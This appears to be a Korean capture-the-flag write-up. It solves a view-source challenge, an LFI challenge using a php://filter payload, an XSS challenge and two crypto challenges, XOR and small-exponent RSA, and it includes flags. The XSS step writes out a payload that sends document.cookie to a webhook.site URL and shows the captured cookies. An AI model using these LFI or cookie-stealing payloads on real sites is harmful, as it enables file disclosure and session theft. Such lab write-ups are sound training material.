WEB


Source Viewer


1. 소스보기
// Page script as served to the browser (visible through view-source).
// The click handler is a decoy: it only shows a message and never touches the flag.
document.getElementById('button').onclick = function() {
   alert("That's wrong haha Find more");
    };
    // The flag is split into fragments that are shipped to every visitor.
    // Anything placed in client-side JavaScript is readable by the user, so
    // splitting or encoding a secret here gives no confidentiality.
    var a = "KCTF";
    var b = "{";
    var c = "THIS_IS_";
    // Character codes 70, 76, 65, 71 decode to "FLAG".
    var d = String.fromCharCode(70, 76, 65, 71);
    var e = "}";

2. 변수 a~e를 순서대로 이어 붙이면 플래그가 됩니다 (d는 문자 코드 70, 76, 65, 71 = "FLAG").
a+b+c+d+e = #KCTF{THIS_IS_FLAG}

LFI


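1. LFI 구문 삽입 (path 파라미터 값이 검증 없이 파일 경로로 사용되는 것으로 보임. flag.php를 그대로 불러오면 PHP로 실행되어 소스가 출력되지 않으므로, php://filter로 base64 인코딩된 소스를 읽음)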
<http://13.209.181.167:40083/?path=php://filter/convert.base64-encode/resource=/var/www/html/flag.php>

2. base64 디코딩
PD9waHAKCWVjaG8gIkhlbGxvIjsKCSRmbGFnID0gIktDVEZ7bGZpX21hc3Rlcn0iOwo/Pg==

3.
<?php
	echo "Hello";
	$flag = "KCTF{lfi_master}";
?>

#KCTF{lfi_master}

EZ_XSS


1. FastAPI docs 페이지 접속
<http://13.209.181.167:40084/docs> 

2. XSS 구문 삽입
{
  "code": "location.href='<https://webhook.site/7e68ff52-14d4-4b82-b7c2-1c72c5ed6035?'+document.cookie>"
}

3.
<https://webhook.site/7e68ff52-14d4-4b82-b7c2-1c72c5ed6035?AWSALBTG=4a60lENTw3SdHgde8aruvbjm1fOk0XGkow/fLZsOV/g150gp20/csrShORs3JO6bc7TNKbYiegwmyQK0Xv0zNyPPbY2jdJ0r6oeKuu7aX9JfNA0G9TiSR4YyxVlHlzuG66VImJazlgbLGvp/lMN0dlD4AeQ+e3fUxmCyIeFiwKg4eAjQ+Ks=;%20AWSALBTGCORS=4a60lENTw3SdHgde8aruvbjm1fOk0XGkow/fLZsOV/g150gp20/csrShORs3JO6bc7TNKbYiegwmyQK0Xv0zNyPPbY2jdJ0r6oeKuu7aX9JfNA0G9TiSR4YyxVlHlzuG66VImJazlgbLGvp/lMN0dlD4AeQ+e3fUxmCyIeFiwKg4eAjQ+Ks=;%20flag=KCTF{EZ_INJECTION}>

#KCTF{EZ_INJECTION}

Crypto


Thug Life


from pwn import xor
from Crypto.Util.number import *

# Known plaintext component: the lyric is one of the three XOR operands.
thug_life = b"Yeah Beyonce Perfect And Rihanna too Kanye's a genius And Drake's so cool All the Kardashian's China and Caitlyn too I want to be famous gonna be famous Just like you"

# The two hex blobs given by the challenge, converted from integers to bytes.
# NOTE(review): long_to_bytes() drops leading zero bytes; neither literal
# starts with 00 here, so the byte lengths are preserved.
long_blob = long_to_bytes(0x32573d4b4282e0d37b0347cead9b85d4c72def2293c408e65fe49851b05bb12e965997592c95f36862817439edad63bfe2f480243a78bb2d735424f562fc4a61ac72832f8260ebe283157761084d238399b70eaf9d8c43fd4b962e3f78f25291fe432c21a13917f7ebd273fff7dff18b23de21c231eb49495fc065dbc396c153236a1f262b7f476bcd75d28e8bc14ed0f476ac4c6fe7b733ad41287a505e13a2df9bd0dc33b0)
short_blob = long_to_bytes(0x2071086519b4edc347326dd8d2a195d5d517cd09d1e001eb31f89857b66a9c27d3488a69798eef)

# Step 1: combine the two blobs. The blobs differ in length; the nesting of
# the two xor() calls is kept exactly as in the original so that any
# length handling inside xor() is applied in the same order.
combined = xor(short_blob, long_blob)

# Step 2: remove the lyric layer. XOR is its own inverse, so applying the
# known lyric again leaves the remaining operand (the flag material).
res = xor(combined, thug_life)
print(res)

#KCTF{thiS_Is_just_A_begiNNing_Cheer_uP}

WarmUp RSA


import gmpy2

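# Ciphertext from the challenge. Taking a plain cube root only recovers the
# message when it was encrypted without padding and m**3 is smaller than the
# modulus, so that c == m**3 over the integers.
# NOTE(review): presumably e = 3; neither e nor n is shown on this page.
cipher = 281827188589453117651587122569600154626922955240619436601295790393278898844588102785245701754162220704995433015679433374002958693

# iroot() is an exact integer root and returns (floor_root, is_exact), so the
# result does not depend on a hand-picked floating-point precision and an
# inexact root is detected instead of being silently truncated.
root, exact = gmpy2.iroot(cipher, 3)
if not exact:
    print("warning: ciphertext is not a perfect cube; result is the floor of the root")

pt = int(root)

# Convert the integer straight to bytes. The previous form called .decode("hex")
# on the return value of print(), which is None on Python 3, and the "hex"
# codec for str no longer exists there; it also failed on odd-length hex.
print(pt.to_bytes((pt.bit_length() + 7) // 8, "big").decode("ascii", errors="replace"))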

#KCTF{Y0u_Ar3_C00L}